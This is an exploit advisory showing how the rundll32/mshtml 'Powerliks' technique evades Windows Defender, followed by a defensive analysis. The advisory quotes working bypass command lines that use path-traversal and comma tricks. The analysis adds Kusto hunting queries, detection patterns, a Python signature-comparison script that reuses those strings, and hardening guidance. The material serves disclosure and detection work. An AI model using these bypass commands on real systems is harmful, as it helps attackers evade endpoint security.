Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G

Exploit Author: hyp3rlinx
Analysis Author: www.bubbleslearn.ir
Category: Local
Language: Shell
Published Date: 2024-04-02
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec     
 

[Vendor]
www.microsoft.com


[Product]
Windows Defender


[Vulnerability Type]
Windows Defender Detection Mitigation Bypass
TrojanWin32Powessere.G


[CVE Reference]
N/A


[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
and attackers will typically get an "Access is denied" error message.

Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml, but it has since been mitigated.
Recently, on Feb 7, 2024, I disclosed that using multiple commas "," would bypass that mitigation, but that has since been fixed again.
The fix was short-lived, as I found yet another, third trivial bypass soon after.


[Exploit/POC]
Open command prompt as Administrator.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13)
Access is denied.

C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')


[Video PoC URL]
https://www.youtube.com/watch?v=yn9gdJ7c7Kg


[Network Access]
Local


[Severity]
High


[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
https://twitter.com/hyp3rlinx/status/1755417914599956833
https://twitter.com/hyp3rlinx/status/1758624140213264601


[Disclosure Timeline]
Vendor Notification:  
February 16, 2024 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


Microsoft Windows Defender — Detection & Mitigation Bypass: TrojanWin32Powessere.G (Powerliks) — Analysis and Defensive Guidance

This article reviews a class of mitigation bypasses reported against Microsoft Defender’s detection for TrojanWin32Powessere.G (commonly associated with “Powerliks” rundll32/jscript abuse). It summarizes the technique at a high level, explains why the tactics worked historically, and — most importantly — provides detection, hardening and safe-testing guidance for defenders and incident responders. This content focuses on defensive analysis and does not provide exploit-ready payloads or step-by-step attack recipes.

Executive summary

  • TrojanWin32Powessere.G is a detection name tied to techniques where attackers abuse legitimate Windows hosts (rundll32.exe + mshtml/jscript) to launch script-based payloads.
  • Researchers have disclosed multiple mitigation bypasses over 2022–2024 that manipulated argument parsing and COM/URL handler routing to evade heuristics and blocking logic.
  • Microsoft has iteratively patched these bypasses; however, small differences in command-line parsing or argument separators can sometimes slip past signatures or heuristics until rules are updated.
  • Defenders should prioritize blocking dangerous execution paths (AppLocker/WDAC), harden Defender settings, and add behavioral detections that do not rely solely on exact string matches.

How the technique works (high-level)

At a conceptual level the technique abuses a legitimate system binary (rundll32.exe) to host a scripting engine — historically mshtml/jscript — that can interpret inline scripts or load script-hosted content. Detection logic often looks for obvious indicators such as specific parameter tokens or well-known calling patterns. Attackers then craft alternate encodings/argument separators and path traversal variants so the command line no longer matches the original signatures, but the system still resolves and executes the script.

Key elements that made these bypasses effective:

  • Use of a signed, trusted binary (rundll32.exe) to evade binary allowlisting checks.
  • Variation in how Windows parses quoted arguments, escape sequences, or path separators — small differences can lead to mismatches against simple signature rules.
  • Reliance on mshtml/jscript COM entry points that are allowed by default for backward compatibility, creating an attack surface for script hosting.

Why simple signature fixes can be short-lived

Signature-based detections that match exact substrings (for example, a fixed token sequence) can be brittle. Attackers with knowledge of what is matched can slightly alter separators, encodings, or add redundant path elements to avoid those exact matches while preserving behavior. A resilient defensive approach combines signatures with behavioral, context-aware telemetry and blocking of entire risky execution patterns.

Defensive recommendations (prioritized)

  • Apply vendor updates and signatures — ensure Windows and Defender signature updates are current. Microsoft has released mitigations and rule updates after researcher disclosures.
  • Enable and enforce application control — use AppLocker or Windows Defender Application Control (WDAC) to restrict execution of scripting hosts and limit rundll32.exe usage to only trusted callers.
  • Harden Attack Surface Reduction (ASR) rules — enable ASR rules that block Office and other vectors from creating child processes or launching script interpreters from non-standard locations.
  • Enable cloud protection and tamper protection in Microsoft Defender to ensure rapid distribution of cloud-delivered protections and prevent attackers from disabling endpoint protections.
  • Whitelist legitimate automation and block odd rundll32 usage — create allowlists that permit known, documented rundll32 usage and flag any rundll32 launches with inline scripting or unusual command-line patterns.
  • Monitor for anomalous parent/child relationships — track when standard system utilities are spawned by uncommon parents (e.g., rundll32.exe launched by a non-system user process).
  • Isolate browser/script components you do not use — if mshtml-based script hosting is not required in an environment, consider reducing exposure by restricting or removing legacy components.

Hunting queries and detection patterns (Defender for Endpoint / Microsoft 365 Defender)

Below are sample defensive hunting queries that can be used to detect suspicious rundll32 usage. These are intended to be used in secure SOC environments and tuned to reduce false positives.

// Example Kusto query for Defender for Endpoint (DeviceProcessEvents)
// Detect rundll32.exe executions with unusual command-line tokens commonly used to host script engines
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine has "javascript:" or ProcessCommandLine has "mshtml"
| where ProcessCommandLine !contains "KnownTrustedToken1"  // tune or remove as needed
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessAccountName, ProcessCommandLine, ReportId
| order by Timestamp desc

Explanation: This query searches process telemetry for rundll32.exe instances with command-line substrings indicative of script-hosting usage (e.g., embedded "javascript" or mshtml references). Tune exceptions to reduce noise in your environment.

// Example Kusto query to find rundll32 executed from non-standard parent processes
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where InitiatingProcessFileName !in ("explorer.exe","svchost.exe","services.exe","taskeng.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessAccountName, ProcessCommandLine
| order by Timestamp desc

Explanation: This query highlights rundll32.exe runs where the parent process is not one of the expected Windows hosts, which can indicate abuse.
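The brittleness described under "Why simple signature fixes can be short-lived" and the two hunting queries above can be exercised offline with the following added example. It is not code from the advisory or from Microsoft: it runs a constructed set of telemetry rows (standing in for DeviceProcessEvents rows already filtered to rundll32.exe, with the two command-line forms quoted in the advisory plus two benign controls) through an illustrative exact-substring signature and through a canonicalizer that reduces the command line to the module and entry point the loader would actually resolve (quotes dropped, scheme prefix removed, comma runs collapsed, `..` traversal applied). The signature string, the parent allowlist and the rule names are assumptions chosen for the demonstration, not Defender's real rules.

```python
import re
from dataclasses import dataclass

# Constructed sample telemetry (not real events). The second and third command
# lines are the two forms quoted in the advisory above; the others are benign.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmd": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"parent": "cmd.exe", "cmd": r'rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13)'},
    {"parent": "cmd.exe", "cmd": r'rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert(1)'},
    {"parent": "svchost.exe", "cmd": r"rundll32.exe printui.dll,PrintUIEntry /?"},
]

# Illustrative brittle signature (constructed; not Defender's actual rule): the
# kind of exact substring a first-generation mitigation might have matched.
NAIVE_SIGNATURE = r"..\mshtml,RunHTMLApplication"

SCRIPT_SCHEMES = ("javascript:", "vbscript:")
SCRIPT_HOST_MODULES = {"mshtml", "mshtml.dll"}
SCRIPT_HOST_ENTRIES = {"runhtmlapplication"}
# Mirrors the parent allowlist of the second hunting query; tune per environment.
EXPECTED_PARENTS = {"explorer.exe", "svchost.exe", "services.exe", "taskeng.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def naive_signature_hit(cmd: str, signature: str = NAIVE_SIGNATURE) -> bool:
    """Exact substring match on the raw command line (case-insensitive)."""
    return signature.lower() in cmd.lower()


def resolve_path(fragment: str) -> str:
    """Collapse separator runs and apply '.' / '..' with stack semantics, clamped
    at the root, so '\\..\\..\\mshtml\\..\\..\\mshtml' and '\\..\\..\\mshtml' both
    reduce to 'mshtml'."""
    stack = []
    for part in re.split(r"[\\/]+", fragment):
        if part in ("", "."):
            continue
        if part == "..":
            if stack:
                stack.pop()
            continue
        stack.append(part)
    return "\\".join(stack)


def canonical_rundll32_target(cmd: str):
    """Reduce a rundll32 command line to a lowercase (module, entry) pair the way
    the loader would see it. Returns None when no 'dll,entry' pair is present."""
    s = cmd.lower().replace('"', "")
    s = re.sub(r"^\s*\S*rundll32(\.exe)?\s+", "", s)   # drop the image name
    head = re.split(r"[\s;]", s, maxsplit=1)[0]        # 'dll,entry' ends at whitespace or ';'
    for scheme in SCRIPT_SCHEMES:                      # strip a URL-style scheme prefix
        if head.startswith(scheme):
            head = head[len(scheme):]
    head = re.sub(r",+", ",", head)                    # ',,' and ',' are the same separator
    if "," not in head:
        return None
    path, entry = head.split(",", 1)
    module = resolve_path(path).rsplit("\\", 1)[-1]    # last path component after traversal
    return module, entry


def analyze(event: dict) -> list:
    """Behavioural checks that survive separator, quoting and traversal variation."""
    findings = []
    cmd = event["cmd"]
    target = canonical_rundll32_target(cmd)
    if target:
        module, entry = target
        if module in SCRIPT_HOST_MODULES or entry in SCRIPT_HOST_ENTRIES:
            findings.append(Finding("script-host-module", f"{module},{entry}"))
    if any(scheme in cmd.lower() for scheme in SCRIPT_SCHEMES):
        findings.append(Finding("inline-script-scheme", cmd))
    if event["parent"].lower() not in EXPECTED_PARENTS:   # noisy on its own; corroborating signal
        findings.append(Finding("unexpected-parent", event["parent"]))
    return findings


def scan(events) -> list:
    """Return [(index, naive_signature_hit, [rule names])] for every event."""
    return [(i, naive_signature_hit(e["cmd"]), [f.rule for f in analyze(e)])
            for i, e in enumerate(events)]


if __name__ == "__main__":
    for i, naive, rules in scan(SAMPLE_EVENTS):
        print(f"event {i}: naive_signature={naive} rules={rules}")
```

Running it shows the point of the section: the exact-substring signature misses both quoted variants, while the canonicalized form of each is simply `mshtml,runhtmlapplication`, so a rule keyed on the resolved module and entry point fires regardless of how many separators or traversal segments were inserted. The benign control-panel and printui launches produce no findings.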

Safe testing practices (lab guidance)

  • Never test bypasses on production systems or networks. Use isolated lab VMs that are fully offline or on an isolated VLAN.
  • Use benign, instrumented samples to validate detection logic (for example: no-op scripts or synthetic telemetry) rather than active malware or bypass strings.
  • Capture full telemetry (process command lines, parent process tree, registry, and file writes) when testing so you can craft robust detections based on behavior rather than exact payloads.
  • Coordinate with vendor support and follow disclosure policies if you discover a new bypass.

Incident response: what to look for

  • Unexpected rundll32.exe launches with long or oddly formatted command-line arguments, particularly those containing “javascript”/“mshtml” or multiple separators/escape sequences.
  • Child processes or network connections initiated by rundll32.exe or mshtml-hosted script contexts.
  • Creation of scheduled tasks, persistence via registry autorun entries, or dropped files in temporary or user profile directories immediately after such launches.
  • Unusual parent process relationships and activity occurring outside normal business hours.

Example indicators of suspicious behavior (safe, non-actionable)

Telemetry Type | Suspicious Pattern
Process        | rundll32.exe launched with inline script-like command-line tokens or references to script hosting components
Parent/Child   | rundll32.exe spawned by non-standard processes or by user-level processes from unexpected directories
File           | Short-lived or unexpectedly created HTML/JS files in temp or profile folders following rundll32 activity
Network        | Outbound connections shortly after suspicious rundll32/mshtml activity to unknown hosts

Timeline & attribution

Date         | Event
2022         | Initial public reporting of mshtml path traversal bypasses for Defender detection.
Feb 7, 2024  | Researcher disclosed alternate bypass techniques relying on command-line encoding that were later patched.
Feb 16, 2024 | Public disclosure and vendor notification (researcher: hyp3rlinx / John Page).

References and further reading

  • Research advisory (hyp3rlinx) — for context and researcher write-ups.
  • Microsoft documentation on AppLocker, WDAC and Defender for Endpoint hardening — consult Microsoft Learn for up-to-date guidance.
  • Best practices for secure lab testing and safe malware handling — follow CERT/organization policies and legal guidance.

Closing notes for defenders

The pattern shown by these disclosures is a reminder that legitimate, signed binaries used as hosts for scripts represent a recurring attack surface. Rather than relying exclusively on fixed string matching, build layered defenses: application control, heuristic/behavioral detections, and robust telemetry. Maintain an isolated test environment for validation, and coordinate with vendors when encountering new bypass techniques.